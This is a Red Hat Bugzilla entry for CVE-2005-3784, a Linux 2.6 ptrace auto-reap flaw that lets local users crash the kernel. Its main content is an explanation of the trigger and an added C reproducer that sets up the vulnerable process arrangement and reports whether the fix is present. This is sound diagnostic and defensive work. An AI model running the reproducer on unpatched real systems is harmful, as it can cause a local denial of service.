Red Hat Bugzilla – Bug 174078
[RHEL4] CVE-2005-3784 auto-reap DoS
Last modified: 2007-11-30 17:07:21 EST
The auto-reap of child processes in Linux kernel 2.6 before
2.6.15 includes processes with ptrace attached, which leads to
a dangling ptrace reference and allows local users to cause a
denial of service (crash).
Fixed upstream by
Created attachment 122347
I don't know of an existing test case unless one was posted on lkml.
The way to produce the situation is to have a real parent that has set SIGCHLD
to SIG_IGN, a child of that parent, a ptracer tracing the child, and then have
the child die (e.g. kill -9 it). The bug here means that the tracer will not
get a SIGCHLD, and the child will be reaped while the tracer is still attached.
Note that if the tracer is already blocked in a wait* syscall, it will be woken
up regardless of the bug, and so that might make it respond quickly enough to
mask the effects of the bug. So, do not test using a tracer already blocked in
wait* when the child dies; this is what the obvious sort of test using strace
will do, and it may not be sufficient to clearly diagnose the bug.
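The following reproducer is an added example written for this page; it is not the attachment from the bug report and not the reporter's code. It builds the exact topology described above: a real parent that has set SIGCHLD to SIG_IGN, a child of that parent, and a sibling tracer that attaches to the child and then, as the reporter insists, sits in a timed sleep rather than in wait*() when the child is killed with SIGKILL. The pipe-based hand-off, the one-second idle window, the process names (P, C, T) and the PR_SET_PTRACER call are my own choices; PR_SET_PTRACER is only needed so a sibling may attach under Yama on modern kernels and did not exist on the 2.6.x kernels this bug concerns (prctl simply fails harmlessly there). On a kernel with the fix the tracer receives SIGCHLD and can reap the tracee; on an affected kernel the tracee is reaped behind the tracer's back and waitpid() fails with ECHILD.

```c
/* autoreap.c: added reproducer for the ptrace auto-reap scenario (not from
 * the bug report). Process tree, all names are mine:
 *   P  real parent, SIGCHLD set to SIG_IGN
 *   |-- C  tracee, idles in pause()
 *   `-- T  tracer, attaches to C and then deliberately stays OUT of wait*()
 * P kills C with SIGKILL while T is attached but sleeping.
 * Build: cc -o autoreap autoreap.c   (Linux only) */
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#ifndef PR_SET_PTRACER                 /* headers predating Yama */
#define PR_SET_PTRACER 0x59616d61
#define PR_SET_PTRACER_ANY ((unsigned long)-1)
#endif

enum outcome { OUTCOME_FIXED, OUTCOME_BUGGY, OUTCOME_INCONCLUSIVE };
struct report { int got_sigchld; pid_t waited; int status; int err; };

/* Interpret what the tracer observed after the tracee was killed. Pure
 * function, so it can be checked without ptrace privileges. */
enum outcome classify(const struct report *r, pid_t tracee)
{
    if (r->got_sigchld && r->waited == tracee &&
        WIFSIGNALED(r->status) && WTERMSIG(r->status) == SIGKILL)
        return OUTCOME_FIXED;          /* C stayed attached and reapable by T */
    if (r->waited == -1 && r->err == ECHILD)
        return OUTCOME_BUGGY;          /* C was auto-reaped out from under T */
    return OUTCOME_INCONCLUSIVE;
}

static volatile sig_atomic_t sigchld_seen;
static void on_sigchld(int sig) { (void)sig; sigchld_seen = 1; }

/* Idle until an absolute deadline, resuming after any signal. The tracer
 * must be here, not blocked in wait*(), when C dies, or the bug is masked. */
static void sleep_until(const struct timespec *deadline)
{
    while (clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, deadline, NULL) == EINTR)
        ;
}

static void tracer(pid_t c, int ready_fd, int result_fd)
{
    struct report r = { 0, 0, 0, 0 };
    struct timespec deadline;
    int st;

    signal(SIGCHLD, on_sigchld);       /* replace the SIG_IGN inherited from P */
    if (ptrace(PTRACE_ATTACH, c, 0, 0) == -1) { perror("PTRACE_ATTACH"); exit(2); }
    if (waitpid(c, &st, 0) != c || !WIFSTOPPED(st)) { perror("attach stop"); exit(2); }
    sigchld_seen = 0;                  /* discard the SIGCHLD for the attach stop */
    if (ptrace(PTRACE_CONT, c, 0, 0) == -1) { perror("PTRACE_CONT"); exit(2); }

    (void)write(ready_fd, "r", 1);     /* P may kill C now */
    clock_gettime(CLOCK_MONOTONIC, &deadline);
    deadline.tv_sec += 1;              /* one second idle, chosen arbitrarily */
    sleep_until(&deadline);

    r.got_sigchld = sigchld_seen;
    r.waited = waitpid(c, &r.status, WNOHANG);
    r.err = errno;
    (void)write(result_fd, &r, sizeof r);
    exit(0);
}

int main(void)
{
    int cready[2], tready[2], result[2];
    struct report r;
    char b;
    pid_t c, t;

    if (pipe(cready) || pipe(tready) || pipe(result)) { perror("pipe"); return 2; }
    signal(SIGCHLD, SIG_IGN);          /* the precondition: real parent ignores SIGCHLD */

    c = fork();
    if (c == 0) {                      /* tracee */
        prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0);  /* let sibling T attach under Yama */
        (void)write(cready[1], "c", 1);
        for (;;) pause();
    }
    if (read(cready[0], &b, 1) != 1) { perror("child start"); return 2; }

    t = fork();
    if (t == 0) tracer(c, tready[1], result[1]);
    if (read(tready[0], &b, 1) != 1) { fputs("tracer failed to attach\n", stderr); return 2; }

    kill(c, SIGKILL);                  /* the "kill -9" from the report, while T is idle */

    if (read(result[0], &r, sizeof r) != (ssize_t)sizeof r) { fputs("tracer died\n", stderr); return 2; }
    switch (classify(&r, c)) {
    case OUTCOME_FIXED: puts("tracer got SIGCHLD and reaped the tracee: fix present"); return 0;
    case OUTCOME_BUGGY: puts("tracee vanished (ECHILD) while still traced: auto-reap bug"); return 1;
    default: printf("inconclusive: sigchld=%d waited=%d errno=%d\n",
                    r.got_sigchld, (int)r.waited, r.err); return 2;
    }
}
```

Run it as an ordinary user; no tracing privilege beyond what Yama grants to a process named with PR_SET_PTRACER is required. An exit status of 0 means the tracer was notified and could reap the killed tracee, 1 means the tracee disappeared from under the tracer, and 2 means the setup itself failed (for example because ptrace is disallowed in the environment), in which case the result says nothing about the kernel.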
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.